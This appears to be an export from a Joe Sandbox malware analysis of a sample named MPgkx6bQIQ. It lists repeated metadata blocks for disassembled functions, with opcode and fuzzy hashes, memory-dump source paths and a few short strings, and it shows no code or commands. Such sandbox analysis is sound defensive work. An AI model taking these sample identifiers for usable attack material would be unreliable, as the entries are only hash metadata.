                                                                                                                                                                                                                                                                                          • String ID: Fg
                                                                                                                                                                                                                                                                                          • API String ID: 0-875302535
                                                                                                                                                                                                                                                                                          • Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                                                          • Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
                                                                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                                                                          • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                                          • Opcode ID: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                                                          • Instruction ID: 3857215666f84e8390459b9bd9abf44e1a4e85b426ac560a58865be899005c0d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B671D2B17107414FD729CF39C85076ABBD2AB86314F18C57EC096CB7A6EA78E442CB40
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                          • Instruction ID: 045a9a66e0ca56219c33e5b6367f29c7ce276d61e6951a7732c068842d72bae6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A871D432A083658BD7248E2CC4A032FBBF2ABD5754F19852EE4949B391D335DC46CB82
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                          • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: DB
                                                                                                                                                                                                                                                                                          • API String ID: 0-3908451873
                                                                                                                                                                                                                                                                                          • Opcode ID: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
                                                                                                                                                                                                                                                                                          • Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5d81c37cb7d393257c23fd21a2bc174357223c4d1b28a71c8bcec52b0dc5dc8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: LB
                                                                                                                                                                                                                                                                                          • API String ID: 0-539997225
                                                                                                                                                                                                                                                                                          • Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                                                          • Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Y*>
                                                                                                                                                                                                                                                                                          • API String ID: 0-3862480330
                                                                                                                                                                                                                                                                                          • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                                          • Instruction ID: fb16322e453b7c659a8661eae6fdd911598fc5404158bfb078b4b9f78130c322
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C512633B499914BEB2DC93C4C223AAAE834BD6134B2DD77BD8B1CB3E5D56588468740
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 74e5d679941b5201df3add8242bcee197539960a97a0704daeb999c7d2de46bb
                                                                                                                                                                                                                                                                                          • Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74e5d679941b5201df3add8242bcee197539960a97a0704daeb999c7d2de46bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                                                          • Instruction ID: 9c79f7e63c480dd40f7a7ccc60d41b21814d9940eb0dc65dd07d8a453e372cf2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16120E35204B018FD325CF29C8907A3BBE2EF9A314F19866DD4DA8B795D738E846CB54
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                                          • Instruction ID: 7ef22f74320786e985984db4684891e33db06cf37ac3f1a4b90d4ae89cdd28e9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E52F3715183458FC715DF18C0906AEBFE1BF88B18F1986AEF8995B341D774E889CB81
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                                          • Instruction ID: b7901f3288d9e4572b9bc57ce4c79cacd886df45a950704f10474c7163005246
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE52F4715083458FCB14CF18C0806AABFE1BF89315F18867EF8996B391D778EA49CB85
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                                                          • Instruction ID: 1f2acf7be47b03e23fd54eba74ebe2fbb865082f0c63473d8b1e041d753d5fe4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5852E570A18B848FE771EB24C4943ABFBE1EB41314F15492FD5EA06BC2D379A485CB16
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                                                          • Instruction ID: f9402e00db0146810cf529bce4eeb96ef771652ee20e7226bad8efb3fef3d353
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA52C7B0A08B848FE735CB24C4843A7BBE1AB51314F15893FD5E716BC2C27DA995C71A
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
• Instruction ID: 379f34030245abb869f7841496477135af09ff579d289cec90ed8b53ab3637d5
• Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
• Instruction Fuzzy Hash: 87625CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
• Instruction ID: d272bb6b5d6e2c7a5f0cafe8b1d1f27913d4ef5c9ad92f98558892845c7f91e7
• Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
• Instruction Fuzzy Hash: B5625CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
• Instruction ID: 939b1bda7137b1d84d7c2f62d406c41550934713dde7fc45adb5931d91826267
• Opcode Fuzzy Hash: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
• Instruction Fuzzy Hash: 85322471524B118FC378EF29C69052ABBF1BF45A10B504A6ED6A78BF90D736F885CB10
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
• Instruction ID: 8144078db26368c744c360e93e32fc00ce9f8f0de831ebeb02b125b62bc0a424
• Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
• Instruction Fuzzy Hash: B802C7366187518BD724EF18D89067FF3E2EFC4309F29892EC98697385E734A545CB42
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
• Instruction ID: 1131e2afb1b9b7a06d06e0851762e967182e12a53f43e8bd2da4f6050e1e8ff1
• Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
• Instruction Fuzzy Hash: C802C732A0C7118BC724DE18D8816ABB3E2EBD4345F19893ED586A73C5D738B815CB4B
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4dd2ae9de0c92353fdee7b76ec7abb733c8c81e1fe53acaa0633d379e72706e7
• Instruction ID: 6564eefc0a79269b3db00a3a3e2fdb8cf1d61b2510fe7412d98733e2447c0821
• Opcode Fuzzy Hash: 4dd2ae9de0c92353fdee7b76ec7abb733c8c81e1fe53acaa0633d379e72706e7
• Instruction Fuzzy Hash: 6CC128342047418FD7258F28C890AA7BBE1FF9B310F58896ED4D6477A2CB75E846CB58
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
• Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
• Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
• Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
• Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
• Opcode Fuzzy Hash: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
• Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                                                                                                                                                                                                                                                          • Instruction ID: 87b3f835fa5bd3ce3770cbf32822303de73faf0344c427b6f8872b90041194a1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBE18A311083458FC321EF29C880A2BFBE5EF99204F44892EE5D987752E335E948CB96
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 2e3d702f462c947c04f76d2767d49a70cc8d8a13f72f5fef100d598c3194e41d
                                                                                                                                                                                                                                                                                          • Instruction ID: 93b8c5387be001e94cab0129f885dbabef0bc68014b552001e05b684e15851e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e3d702f462c947c04f76d2767d49a70cc8d8a13f72f5fef100d598c3194e41d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48E19A712087418FD720DF29C880A6BBBE1EF99304F44882EE4D597792E379E944CB96
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                                          • Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: ac1a7de888730ed19efd1b3a810a8cf5ee67ec92a46044f1e54f4af5458cd7db
                                                                                                                                                                                                                                                                                          • Instruction ID: f9929a72ce68a40c3f81f5f1acad1d241ce5af9a0f8176ac8c595b8a2b44423d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac1a7de888730ed19efd1b3a810a8cf5ee67ec92a46044f1e54f4af5458cd7db
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDD15535B05255CFDB14CFB8E8816AEBBB2AF1A300F58417DE551A7392CB388E05CB59
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 0a6ff38b7f88a38b39f0feb0216d1201f336bfe1d4496b7dedc26c113c3b1706
                                                                                                                                                                                                                                                                                          • Instruction ID: d5cd215c1b13ba096a7edb23500220196433edaf6f6a9a1475f9fa8c711fd96c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a6ff38b7f88a38b39f0feb0216d1201f336bfe1d4496b7dedc26c113c3b1706
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25A15971211740CFD729CF29C861A777BF2EF86314719869DD4A28F7A5EB38A801CB50
                                                                                                                                                                                                                                                                                          Memory Dump Source
